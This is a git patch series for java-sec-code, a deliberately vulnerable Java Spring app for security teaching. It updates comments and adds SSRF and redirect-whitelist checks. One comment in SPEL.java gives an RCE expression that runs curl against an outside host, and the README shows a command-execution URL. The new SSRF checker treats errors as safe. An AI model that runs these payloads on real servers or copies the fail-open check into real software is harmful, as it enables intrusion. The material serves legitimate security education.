+### IDEA
+
+直接点击run按钮即可运行。
+
+```
+http://localhost:8080/rce/exec?cmd=whoami
+```
+ 
+返回
+
+``` 
+Viarus
+```
+
+
+
+### Jar包
+
+
+先修改pom.xml里的配置，将war改成jar。
+
+``` 
+    <groupId>sec</groupId>
+    <artifactId>java-sec-code</artifactId>
+    <version>1.0.0</version>
+    <packaging>war</packaging>
+```
+
+再打包运行即可。
+
+```
+mvn clean package -DskipTests 
+java -jar 打包后的jar包路径
+```
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 121c97a1..50a7df08 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -169,5 +169,6 @@
     <orderEntry type="library" name="Maven: org.springframework.security:spring-security-config:4.2.12.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom-extra.xml b/pom-extra.xml
deleted file mode 100644
index d91e6c0e..00000000
--- a/pom-extra.xml
+++ /dev/null
@@ -1,139 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
-         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-
-    <groupId>sec</groupId>
-    <artifactId>java-sec-code</artifactId>
-    <version>1.0.0</version>
-    <packaging>war</packaging>
-
-
-    <parent>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.1.RELEASE</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-web</artifactId>
-            <!-- 移除嵌入式tomcat插件，为了使用非嵌入式的tomcat -->
-            <exclusions>
-                <exclusion>
-                    <groupId>org.springframework.boot</groupId>
-                    <artifactId>spring-boot-starter-tomcat</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-
-        <!-- 添加tomcat servlet api -->
-        <dependency>
-            <groupId>org.apache.tomcat</groupId>
-            <artifactId>tomcat-servlet-api</artifactId>
-            <version>8.0.36</version>
-            <scope>provided</scope>
-        </dependency>
-
-        <!-- 添加thymeleaf为了动态解析html-->
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-thymeleaf</artifactId>
-        </dependency>
-
-        <!-- 处理jdbc的mysql连接-->
-        <dependency>
-            <groupId>mysql</groupId>
-            <artifactId>mysql-connector-java</artifactId>
-            <version>8.0.12</version>
-        </dependency>
-
-        <!-- 处理json数据 -->
-        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
-        <dependency>
-            <groupId>com.alibaba</groupId>
-            <artifactId>fastjson</artifactId>
-            <version>1.2.24</version>
-        </dependency>
-
-
-        <!-- jdom解析xml 最新版本为2.0.6 时间为2015-02-28 https://github.com/hunterhacker/jdom/releases-->
-        <!-- https://mvnrepository.com/artifact/org.jdom/jdom2 -->
-        <dependency>
-            <groupId>org.jdom</groupId>
-            <artifactId>jdom2</artifactId>
-            <version>2.0.6</version>
-        </dependency>
-
-        <!-- https://mvnrepository.com/artifact/org.dom4j/dom4j -->
-        <dependency>
-            <groupId>org.dom4j</groupId>
-            <artifactId>dom4j</artifactId>
-            <version>2.1.1</version>
-        </dependency>
-
-
-        <!-- 获取url根域名-->
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-            <version>21.0</version>
-        </dependency>
-
-        <dependency>
-            <groupId>commons-collections</groupId>
-            <artifactId>commons-collections</artifactId>
-            <version>3.1</version>
-        </dependency>
-
-        <dependency>
-            <groupId>commons-lang</groupId>
-            <artifactId>commons-lang</artifactId>
-            <version>2.4</version> </dependency>
-
-        <dependency>
-            <groupId>org.apache.httpcomponents</groupId>
-            <artifactId>httpclient</artifactId>
-            <version>4.3.6</version>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.httpcomponents</groupId>
-            <artifactId>fluent-hc</artifactId>
-            <version>4.3.6</version>
-        </dependency>
-
-
-        <dependency>
-            <groupId>org.apache.logging.log4j</groupId>
-            <artifactId>log4j-core</artifactId>
-            <version>2.8.2</version>
-        </dependency>
-
-        <dependency>
-            <groupId>com.squareup.okhttp</groupId>
-            <artifactId>okhttp</artifactId>
-            <version>2.5.0</version>
-        </dependency>
-
-
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-digester3</artifactId>
-            <version>3.2</version>
-        </dependency>
-
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-            </plugin>
-        </plugins>
-    </build>
-
-
-</project>
\ No newline at end of file
diff --git a/pom-idea.xml b/pom-idea.xml
deleted file mode 100644
index 44a3b87d..00000000
--- a/pom-idea.xml
+++ /dev/null
@@ -1,125 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0"
-         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-
-    <groupId>sec</groupId>
-    <artifactId>java-sec-code</artifactId>
-    <version>1.0.0</version>
-    <packaging>war</packaging>
-
-
-    <parent>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>1.5.1.RELEASE</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-web</artifactId>
-        </dependency>
-
-
-        <!-- 添加thymeleaf为了动态解析html-->
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-thymeleaf</artifactId>
-        </dependency>
-
-        <!-- 处理jdbc的mysql连接-->
-        <dependency>
-            <groupId>mysql</groupId>
-            <artifactId>mysql-connector-java</artifactId>
-            <version>8.0.12</version>
-        </dependency>
-
-        <!-- 处理json数据 -->
-        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
-        <dependency>
-            <groupId>com.alibaba</groupId>
-            <artifactId>fastjson</artifactId>
-            <version>1.2.24</version>
-        </dependency>
-
-
-        <!-- jdom解析xml 最新版本为2.0.6 时间为2015-02-28 https://github.com/hunterhacker/jdom/releases-->
-        <!-- https://mvnrepository.com/artifact/org.jdom/jdom2 -->
-        <dependency>
-            <groupId>org.jdom</groupId>
-            <artifactId>jdom2</artifactId>
-            <version>2.0.6</version>
-        </dependency>
-
-        <!-- https://mvnrepository.com/artifact/org.dom4j/dom4j -->
-        <dependency>
-            <groupId>org.dom4j</groupId>
-            <artifactId>dom4j</artifactId>
-            <version>2.1.1</version>
-        </dependency>
-
-
-        <!-- 获取url根域名-->
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-            <version>21.0</version>
-        </dependency>
-
-        <dependency>
-            <groupId>commons-collections</groupId>
-            <artifactId>commons-collections</artifactId>
-            <version>3.1</version>
-        </dependency>
-
-        <dependency>
-            <groupId>commons-lang</groupId>
-            <artifactId>commons-lang</artifactId>
-            <version>2.4</version> </dependency>
-
-        <dependency>
-            <groupId>org.apache.httpcomponents</groupId>
-            <artifactId>httpclient</artifactId>
-            <version>4.3.6</version>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.httpcomponents</groupId>
-            <artifactId>fluent-hc</artifactId>
-            <version>4.3.6</version>
-        </dependency>
-
-
-        <dependency>
-            <groupId>org.apache.logging.log4j</groupId>
-            <artifactId>log4j-core</artifactId>
-            <version>2.8.2</version>
-        </dependency>
-
-        <dependency>
-            <groupId>com.squareup.okhttp</groupId>
-            <artifactId>okhttp</artifactId>
-            <version>2.5.0</version>
-        </dependency>
-
-
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-digester3</artifactId>
-            <version>3.2</version>
-        </dependency>
-
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-            </plugin>
-        </plugins>
-    </build>
-
-
-</project>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index ea72cdf6..6f8e114c 100644
--- a/pom.xml
+++ b/pom.xml
@@ -155,6 +155,12 @@
             <version>2.1.5.RELEASE</version>
         </dependency>
 
+        <dependency>
+            <groupId>commons-net</groupId>
+            <artifactId>commons-net</artifactId>
+            <version>3.6</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index bb6ec779..6c8d5625 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -10,9 +10,9 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author: JoyChou
- * @date:   2018年10月24日
- * @desc:   https://github.com/JoyChou93/java-sec-code/wiki/CORS
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.10.24
+ * @desc    https://github.com/JoyChou93/java-sec-code/wiki/CORS
  */
 
 @Controller
@@ -48,6 +48,7 @@ private static String vuls3(HttpServletResponse response) {
         return info;
     }
 
+
     @RequestMapping("/sec")
     @ResponseBody
     private static String seccode(HttpServletRequest request, HttpServletResponse response) {
diff --git a/src/main/java/org/joychou/controller/CRLFInjection.java b/src/main/java/org/joychou/controller/CRLFInjection.java
index 01668290..b0e9af4c 100644
--- a/src/main/java/org/joychou/controller/CRLFInjection.java
+++ b/src/main/java/org/joychou/controller/CRLFInjection.java
@@ -9,9 +9,9 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2018.01.03
- * @desc:   Java 1.7/1.8没有CRLF漏洞 (test in Java 1.7/1.8)
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.01.03
+ * @desc    Java 1.7/1.8 no CRLF vuls (test in Java 1.7/1.8)
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java
index ebef75c8..ea33c59e 100644
--- a/src/main/java/org/joychou/controller/CSRF.java
+++ b/src/main/java/org/joychou/controller/CSRF.java
@@ -7,10 +7,10 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2019.05.31
- * @desc:   check csrf using spring-security
- * @using:  access http://localhost:8080/csrf/ -> click submit
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2019.05.31
+ * @desc    check csrf using spring-security
+ * @usage   Access http://localhost:8080/csrf/ -> click submit
  */
 
 
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 14ac5bd9..964a7777 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -10,9 +10,9 @@
 import java.io.ObjectInputStream;
 
 /**
- * @author: JoyChou
- * @Date:   2018年06月14日
- * @Desc：  该应用必须有Commons-Collections包才能利用反序列化命令执行。
+ * @author JoyChou (joychou@joychou.org)
+ * @Date   2018年06月14日
+ * @Desc   该应用必须有Commons-Collections包才能利用反序列化命令执行。
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index f2afa10a..ac378219 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -21,9 +21,9 @@
 
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2018.08.15
- * @desc:   Java file upload
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.08.15
+ * @desc    Java file upload
  */
 
 @Controller
@@ -136,11 +136,11 @@ private void deleteFile(File... files) {
     }
 
     /**
-     * @desc 不建议使用transferTo，因为原始的MultipartFile会被覆盖
-     * @url https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
+     * 不建议使用transferTo，因为原始的MultipartFile会被覆盖
+     * https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
+     *
      * @param multiFile
      * @return
-     * @throws Exception
      */
     private File convert(MultipartFile multiFile) throws Exception {
         String fileName = multiFile.getOriginalFilename();
@@ -156,8 +156,10 @@ private File convert(MultipartFile multiFile) throws Exception {
     }
 
     /**
+     * Check if the file is a picture.
+     *
      * @param file
-     * @desc 判断文件内容是否是图片
+     * @return
      */
     public static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
diff --git a/src/main/java/org/joychou/controller/IPForge.java b/src/main/java/org/joychou/controller/IPForge.java
index 5874ffc3..d3550e4f 100644
--- a/src/main/java/org/joychou/controller/IPForge.java
+++ b/src/main/java/org/joychou/controller/IPForge.java
@@ -8,10 +8,10 @@
 import javax.servlet.http.HttpServletRequest;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2017.12.29
- * @desc:   Java获取IP安全代码
- * @detail: 关于获取IP不安全代码，详情可查看https://joychou.org/web/how-to-get-real-ip.html
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2017.12.29
+ * @desc    Java获取IP安全代码
+ * @detail  关于获取IP不安全代码，详情可查看https://joychou.org/web/how-to-get-real-ip.html
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java
index a8ebd2ab..4f2fab99 100644
--- a/src/main/java/org/joychou/controller/Index.java
+++ b/src/main/java/org/joychou/controller/Index.java
@@ -11,9 +11,9 @@
 
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2018.05.28
- * @desc:   Index Page
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.05.28
+ * @desc    Index Page
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java
index 971deeee..77bc47f4 100644
--- a/src/main/java/org/joychou/controller/JSONP.java
+++ b/src/main/java/org/joychou/controller/JSONP.java
@@ -8,7 +8,7 @@
 
 
 /**
- * @author  JoyChou
+ * @author  JoyChou (joychou@joychou.org)
  * @date    2018年10月24日
  */
 
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index 8583d2db..983e3164 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -10,10 +10,10 @@
 import java.io.InputStreamReader;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2018.05.24
- * @desc:   java xxe vuls code
- * @fix:    过滤造成命令执行的参数
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.05.24
+ * @desc    Java code execute
+ * @fix     过滤造成命令执行的参数
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/SPEL.java b/src/main/java/org/joychou/controller/SPEL.java
index 481aed46..e0ad72fb 100644
--- a/src/main/java/org/joychou/controller/SPEL.java
+++ b/src/main/java/org/joychou/controller/SPEL.java
@@ -7,12 +7,12 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 import javax.servlet.http.HttpServletRequest;
 
-/*
-    * Author: JoyChou
-    * Date:   2019年01月17日
-    * Desc:   SPEL导致的RCE
-    * Usage:  http://localhost:8080/spel/rce?expression=xxx(xxx为exp的URL编码后的值)
-    * Exp:    T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+/**
+    @author   JoyChou (joychou@joychou.org)
+    @date     2019.01.17
+    @esc      SPEL leas to RCE
+    @usage    http://localhost:8080/spel/rce?expression=xxx. xxx is urlencode(exp)
+    @exp      T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 532c82ef..a65b8ba8 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -10,9 +10,9 @@
 
 
 /**
- * Date：2018年08月22日
- * Author: JoyChou
- * Desc: SQL注入漏洞
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.08.22
+ * @desc    SQL Injection
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index d3d54c33..550b13a3 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -7,6 +7,7 @@
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
 import org.apache.http.impl.client.HttpClients;
+import org.joychou.security.SecurityUtil;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -22,10 +23,9 @@
 
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2017.12.28
- * @desc:   java ssrf vuls code
- * @fix:    https://github.com/JoyChou93/trident/blob/master/src/main/java/SSRF.java
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2017.12.28
+ * @desc    Java ssrf vuls code.
  */
 
 
@@ -174,4 +174,28 @@ public static String ssrf_HttpClient(HttpServletRequest request) {
         }
 
     }
+
+
+    /**
+     * http://localhost:8080/ssrf/ImageIO_safe?url=
+     *
+     * @param request
+     * @return
+     */
+    @RequestMapping("/ImageIO_safe")
+    @ResponseBody
+    public static String ssrf_ImageIO_safecode(HttpServletRequest request) {
+        String url = request.getParameter("url");
+        try {
+            URL u = new URL(url);
+            if (!SecurityUtil.checkSSRF(url)) {
+                return "SSRF check failed.";
+            }
+            ImageIO.read(u); // send request
+        } catch (Exception e) {
+            return e.toString();
+        }
+
+        return "ImageIO ssrf safe code.";
+    }
 }
diff --git a/src/main/java/org/joychou/controller/URLRedirect.java b/src/main/java/org/joychou/controller/URLRedirect.java
index ce52477c..753530d1 100644
--- a/src/main/java/org/joychou/controller/URLRedirect.java
+++ b/src/main/java/org/joychou/controller/URLRedirect.java
@@ -10,11 +10,13 @@
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
+import org.joychou.security.SecurityUtil;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2017.12.28
- * @desc:   Java url redirect
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2017.12.28
+ * @desc    Java url redirect.
+ * @fix     Check redirect url whitelist.
  */
 
 
@@ -23,8 +25,8 @@
 public class URLRedirect {
 
     /**
-     * @disc: 存在URL重定向漏洞
-     * @fix: 添加URL白名单 https://github.com/JoyChou93/trident/blob/master/src/main/java/CheckURL.java
+     * usage: http://localhost:8080/urlRedirect/redirect?url=http://www.baidu.com
+     *
      */
     @GetMapping("/redirect")
     public String redirect(@RequestParam("url") String url) {
@@ -32,8 +34,8 @@ public String redirect(@RequestParam("url") String url) {
     }
 
     /**
-     * @disc: 存在URL重定向漏洞
-     * @fix: 添加URL白名单 https://github.com/JoyChou93/trident/blob/master/src/main/java/CheckURL.java
+     * usage: http://localhost:8080/urlRedirect/setHeader?url=http://www.baidu.com
+     *
      */
     @RequestMapping("/setHeader")
     @ResponseBody
@@ -44,8 +46,8 @@ public static void setHeader(HttpServletRequest request, HttpServletResponse res
     }
 
     /**
-     * @disc: 存在URL重定向漏洞
-     * @fix: 添加URL白名单 https://github.com/JoyChou93/trident/blob/master/src/main/java/CheckURL.java
+     * usage: http://localhost:8080/urlRedirect/sendRedirect?url=http://www.baidu.com
+     *
      */
     @RequestMapping("/sendRedirect")
     @ResponseBody
@@ -56,8 +58,9 @@ public static void sendRedirect(HttpServletRequest request, HttpServletResponse
 
 
     /**
-     * @usage: http://localhost:8080/urlRedirect/forward?url=/urlRedirect/test
-     * @disc: 安全代码，没有URL重定向漏洞。
+     * desc: security code.Because it can only jump according to the path, it cannot jump according to other urls.
+     * usage: http://localhost:8080/urlRedirect/forward?url=/urlRedirect/test
+     *
      */
     @RequestMapping("/forward")
     @ResponseBody
@@ -71,9 +74,21 @@ public static void forward(HttpServletRequest request, HttpServletResponse respo
         }
     }
 
-    @RequestMapping("/test")
+    /**
+     * desc: sendRedirect security code
+     * usage: http://localhost:8080/urlRedirect/sendRedirect_seccode?url=http://www.baidu.com
+     *
+     */
+    @RequestMapping("/sendRedirect_seccode")
     @ResponseBody
-    public static String test() {
-        return "test";
+    public static void sendRedirect_seccode(HttpServletRequest request, HttpServletResponse response) throws IOException{
+        String url = request.getParameter("url");
+        String urlwhitelist[] = {"joychou.org", "joychou.com"};
+        if (!SecurityUtil.checkURLbyEndsWith(url, urlwhitelist)) {
+            // Redirect to error page.
+            response.sendRedirect("https://test.joychou.org/error3.html");
+            return;
+        }
+        response.sendRedirect(url);
     }
 }
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 1b33de64..fb5ce94b 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -14,9 +14,9 @@
 import java.util.regex.Pattern;
 
 /**
- * date: 2018年08月23日
- * author: JoyChou
- * desc: URL白名单绕过
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2018.08.23
+ * @desc    URL whitelist bypass.
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/XSS.java b/src/main/java/org/joychou/controller/XSS.java
index 4f3bdff5..70d4302d 100644
--- a/src/main/java/org/joychou/controller/XSS.java
+++ b/src/main/java/org/joychou/controller/XSS.java
@@ -8,9 +8,9 @@
 import javax.servlet.http.HttpServletRequest;
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2018.01.02
- * @desc:   xss vuls code
+ * @author   JoyChou (joychou@joychou.org)
+ * @date     2018.01.02
+ * @desc     XSS vuls code
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 1531ecf4..11280a51 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -22,9 +22,9 @@
 
 
 /**
- * @author: JoyChou (joychou@joychou.org)
- * @date:   2017.12.22
- * @desc:   Java XXE 漏洞代码，修复代码在注释里
+ * @author  JoyChou (joychou@joychou.org)
+ * @date    2017.12.22
+ * @desc    Java XXE vul code.
  */
 
 @Controller
diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
new file mode 100644
index 00000000..1a4a5d91
--- /dev/null
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -0,0 +1,137 @@
+package org.joychou.security;
+
+import java.net.HttpURLConnection;
+import java.net.InetAddress;
+import java.net.URI;
+import java.net.URL;
+import org.apache.commons.net.util.SubnetUtils;
+
+public class SSRFChecker {
+
+    public static int connectTime = 5*1000;  // 设置连接超时时间5s
+
+    /**
+     * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
+     * url只允许https或者http，并且设置默认连接超时时间。
+     * 该修复方案会主动请求重定向后的链接。最好用Hook方式获取到所有url后，进行判断，代码待续…
+     *
+     * @param url check的url
+     * @return 安全返回true，危险返回false
+     */
+    public static Boolean checkSSRF(String url) {
+
+        HttpURLConnection connection;
+        String finalUrl = url;
+        try {
+            do {
+                // 判断当前请求的URL是否是内网ip
+                Boolean bRet = isInnerIPByUrl(finalUrl);
+                if (bRet) {
+                    return false;  // 内网ip直接return，非内网ip继续判断是否有重定向
+                }
+
+                connection = (HttpURLConnection) new URL(finalUrl).openConnection();
+                connection.setInstanceFollowRedirects(false);
+                connection.setUseCaches(false); // 设置为false，手动处理跳转，可以拿到每个跳转的URL
+                connection.setConnectTimeout(connectTime);
+                //connection.setRequestMethod("GET");
+                connection.connect(); // send dns request
+                int responseCode = connection.getResponseCode(); // 发起网络请求
+                if (responseCode >= 300 && responseCode <=307 && responseCode != 304 && responseCode != 306) {
+                    String redirectedUrl = connection.getHeaderField("Location");
+                    if (null == redirectedUrl)
+                        break;
+                    finalUrl = redirectedUrl;
+                    // System.out.println("redirected url: " + finalUrl);
+                } else
+                    break;
+            } while (connection.getResponseCode() != HttpURLConnection.HTTP_OK);
+            connection.disconnect();
+        } catch (Exception e) {
+            return true;  // 如果异常了，认为是安全的，防止是超时导致的异常而验证不成功。
+        }
+        return true; // 默认返回true
+    }
+
+
+
+    /**
+     * 判断一个URL的IP是否是内网IP
+     *
+     * @return 如果是内网IP，返回true；非内网IP，返回false。
+     */
+    public static boolean isInnerIPByUrl(String url) throws Exception {
+        String host = url2host(url);
+        if (host.equals("")) {
+            return true; // 异常URL当成内网IP等非法URL处理
+        }
+
+        String ip = host2ip(host);
+        if(ip.equals("")){
+            return true; // 如果域名转换为IP异常，则认为是非法URL
+        }
+
+        return isInnerIp(ip);
+    }
+
+
+    /**
+     * 使用SubnetUtils库判断ip是否在内网网段
+     *
+     * @param strIP
+     * @return 如果是内网ip，返回true，否则返回false。
+     */
+    public static boolean isInnerIp(String strIP){
+
+        String blackSubnetlist[] = {"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"};
+
+        for (String subnet: blackSubnetlist) {
+            SubnetUtils utils = new SubnetUtils(subnet);
+            if (utils.getInfo().isInRange(strIP)) {
+                return true;
+            }
+        }
+
+        return false;
+
+    }
+
+    /**
+     * host转换为IP
+     * 会将各种进制的ip转为正常ip
+     * 167772161转换为10.0.0.1
+     * 127.0.0.1.xip.io转换为127.0.0.1
+     *
+     * @param host
+     */
+    public static String host2ip(String host) {
+        try {
+            InetAddress IpAddress = InetAddress.getByName(host); //  send dns request
+            return IpAddress.getHostAddress();
+        }
+        catch (Exception e) {
+            return "";
+        }
+    }
+
+    /**
+     * 从URL中获取host，限制为http/https协议。只支持http:// 和 https://，不支持//的http协议。
+     *
+     * @param url
+     */
+    public static String url2host(String url) {
+        try {
+            // 使用URI，而非URL，防止被绕过。
+            URI u = new URI(url);
+            if (!url.startsWith("http://") && ! url.startsWith("https://")) {
+                return "";
+            }
+
+            return u.getHost();
+
+        } catch (Exception e) {
+            return "";
+        }
+
+    }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 0d444f55..e3fdc4eb 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -1,6 +1,7 @@
 package org.joychou.security;
 
 
+
 import java.net.URI;
 
 public class SecurityUtil {
@@ -8,18 +9,21 @@ public class SecurityUtil {
     /**
      * 通过endsWith判断URL是否合法
      *
-     * @param url
+     * @param url 需要check的url
+     * @param urlwhitelist url白名单list
      * @return 安全url返回true，危险url返回false
      */
     public static Boolean checkURLbyEndsWith(String url, String[] urlwhitelist) {
+        if (null == url) {
+            return false;
+        }
         try {
             URI uri = new URI(url);
-            // 判断是否是http(s)协议
+
             if (!url.startsWith("http://") && !url.startsWith("https://")) {
                 return false;
             }
 
-            // 使用uri获取host
             String host = uri.getHost().toLowerCase();
             for (String whitelist: urlwhitelist){
                 if (host.endsWith("." + whitelist)) {
@@ -29,11 +33,22 @@ public static Boolean checkURLbyEndsWith(String url, String[] urlwhitelist) {
 
             return false;
         } catch (Exception e) {
-            System.out.println(e.toString());
             return false;
         }
     }
 
-
+    /**
+     * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
+     *
+     * @param url check的url
+     * @return 安全返回true，危险返回false
+     */
+    public static Boolean checkSSRF(String url) {
+        if (SSRFChecker.checkSSRF(url)) {
+            return true;
+        } else {
+            return false;
+        }
+    }
 
 }
\ No newline at end of file

From 2e91353cfd60ff832d18c2f38d535aeda356a18b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 21 Jun 2019 20:46:07 +0800
Subject: [PATCH 028/108] update readme

---
 README.md       |  32 +++++++++++++++++---------------
 idea-tomcat.png | Bin 38151 -> 0 bytes
 2 files changed, 17 insertions(+), 15 deletions(-)
 delete mode 100644 idea-tomcat.png

diff --git a/README.md b/README.md
index 2b4fdddc..12a3453b 100644
--- a/README.md
+++ b/README.md
@@ -56,7 +56,7 @@ Sort by letter.
 
 - Exclude tomcat in pom.xml.
 
-    ```
+    ```xml
     <dependency>
         <groupId>org.springframework.boot</groupId>
         <artifactId>spring-boot-starter-web</artifactId>
@@ -70,7 +70,7 @@ Sort by letter.
     ```
 
 - Build war package by `mvn clean package`.
-- Copy war package to Tomcat webapps directory.
+- Copy war package to tomcat webapps directory.
 - Start tomcat application.
 
 Example:
@@ -101,20 +101,22 @@ return:
 Viarus
 ```
 
-### JAR
+### Jar
 
-Change `war` to `jar` in `pom.xml`.
+- Change `war` to `jar` in `pom.xml`.
 
-```
-<groupId>sec</groupId>
-<artifactId>java-sec-code</artifactId>
-<version>1.0.0</version>
-<packaging>war</packaging>
-```
+    ```xml
+    <groupId>sec</groupId>
+    <artifactId>java-sec-code</artifactId>
+    <version>1.0.0</version>
+    <packaging>war</packaging>
+    ```
+
+- Build package and run.
+
+    ```
+    mvn clean package -DskipTests 
+    java -jar target/java-sec-code-1.0.0.jar
+    ```
 
-Build package and run.
 
-```
-mvn clean package -DskipTests 
